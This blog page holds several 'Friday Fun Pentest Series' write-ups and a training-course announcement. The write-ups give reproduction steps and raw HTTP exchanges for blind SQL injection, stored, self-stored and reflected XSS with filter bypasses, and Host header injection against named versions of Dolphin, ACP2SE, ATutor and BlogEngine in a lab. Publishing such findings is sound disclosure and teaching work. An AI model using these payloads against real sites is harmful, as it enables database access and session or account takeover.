MSecure

Friday, 21 March 2025

Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description

- It was noted that the admin functionality was vulnerable to Blind SQL injection

SQL Injection in Admin Functionality

Steps to Reproduce:

Login as admin user and visit the page of "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
Add the MySQL injection SLEEP payload to the "cat" value
Notice that the backend would delay the HTTP response for 14 miliseconds

%27%20and%20(select*from(select(sleep(14)))a)--%20

// HTTP GET Request

GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0

[...]

// HTTP Response

HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510

Friday Fun Pentest Series - 20 - Stored XSS in Messaging Functionality - dolphin.prov7.4.2

Description

- It was identified that the "Send Message" functionality was vulnerable to Stored Cross-Site Scripting, opening the doors for potential account takeovers and more advanced attack scenarios

Stored XSS in Messaging Functionality

Steps to Reproduce:

Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
Add "Recipient" and "Subject" with random words
Add the below mentioned XSS payload that would bypass the XSS filter in the message section
Intercept the HTTP POST request and add the payload once again, as it might get filtered (make sure to URL encode the spaces etc)
It would trigger once the message has been seen

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

// HTTP POST request

POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1

Host: 192.168.58.170

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0

[...]

subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>

// HTTP Response

HTTP/1.1 200 OK

Date: Fri, 21 Mar 2025 17:41:52 GMT

Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40

X-Powered-By: PHP/5.6.40

Content-Length: 455

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile. </div>

</td></tr></table>

</div>

Wednesday, 19 February 2025

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description

- It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS.

Self Stored XSS #1

Steps to Reproduce:

Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>

// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1

Host: 192.168.58.168

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0

[...]

name="><svg onload=prompt(document.cookie)>&submit=Submit

// HTTP Response

HTTP/1.1 200 OK

Date: Wed, 19 Feb 2025 08:22:26 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 1210

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

[...]

<th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>

[...]

Sunday, 16 February 2025

New Web Security Training Course !

Its been a while since I have released any papers related to web security. Without any further delay let me introduce you the "Web Security Training" training manual.

Introduction

Aimed at those that would like to learn more about web security and web app pentesting. The "course" is freely available, with taking the approach of "learn as you practice".

Each topic has a few bullet points describing what the vulnerability entails, then a screenshot and relevant payload, demonstrating the exploitation of the misconfiguration or the relevant issue.

Download Link

File is in PDF format. Requires the download of a VM (virtual machine) OWASP BWA. The course demonstrates OWASP Top 10 flaws and beyond. It is free of charge. Worth mentioning how good the "Mutillidae" web application is for training purposes.

https://drive[dot]google[dot]com/file/d/14FWeVKHz00hIrZH9x6Z4B5MHPH2K3cAu/view?usp=sharing

Saturday, 18 January 2025

Friday Fun Pentest Series - 18 - Host Header Injection - atutorv2.2.4

Description

- It was found that the application had a Host Header Injection vulnerability.

Host Header Injection #1

Steps to Reproduce:

Visit specific page of the application
Intercept the HTTP GET/POST request
Modify the Host header to a domain of attackers choice
Forward the HTTP request

// HTTP GET request

GET /atutor/bounce.php?course=0 HTTP/1.1

Host: yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: http://192.168.1.110/atutor/login.php

Connection: keep-alive

Cookie: ATutorID=oukcasgb86k60mefasc36joje4; flash=no

Upgrade-Insecure-Requests: 1

Priority: u=0, i

// HTTP response

HTTP/1.1 302 Found

Date: Thu, 09 Jan 2025 18:55:35 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly

Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0

Set-Cookie: nexthelp_cookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/

Location: http://yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com/atutor/login.php

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

Friday Fun Pentest Series - 17 - Reflected XSS - atutorv2.2.4

Description

- It was found that the application was vulnerable to Reflected XSS.

Reflected XSS #1 - "theme_dir"

Steps to Reproduce:

Login to the application with admin user
Paste the following URL into the browser

http://192.168.1.110/atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2

// HTTP GET Request

GET /atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2 HTTP/1.1

Host: 192.168.1.110

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Cookie: ATutorID=f6oaq82rkkjc2efnmi1qkig537; flash=no

Upgrade-Insecure-Requests: 1

Priority: u=0, i

// HTTP Response

HTTP/1.1 302 Found

Date: Sat, 18 Jan 2025 20:39:58 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Set-Cookie: ATutorID=o0p8bdoggbsj1h0lf1des5gcm1; path=/atutor/; HttpOnly

Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0

Location: /atutor/mods/_core/themes/index.php

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

Saturday, 14 December 2024

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

Description

- It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place.

Stored XSS Filter Bypass #1 - "Add Category"

Steps to Reproduce:

Login as admin and go to "Content" > "Posts"
On the right side of the page choose "Categories"
In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>

// HTTP PUT request

PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

[...]

","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}

[...]

// HTTP response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0

// HTTP GET request

GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

// HTTP response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229

[...]
<span class="post-category"><a href="/blogengine/category/<b>12345<b><script>alert(1)<script><b>12345=<b>"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]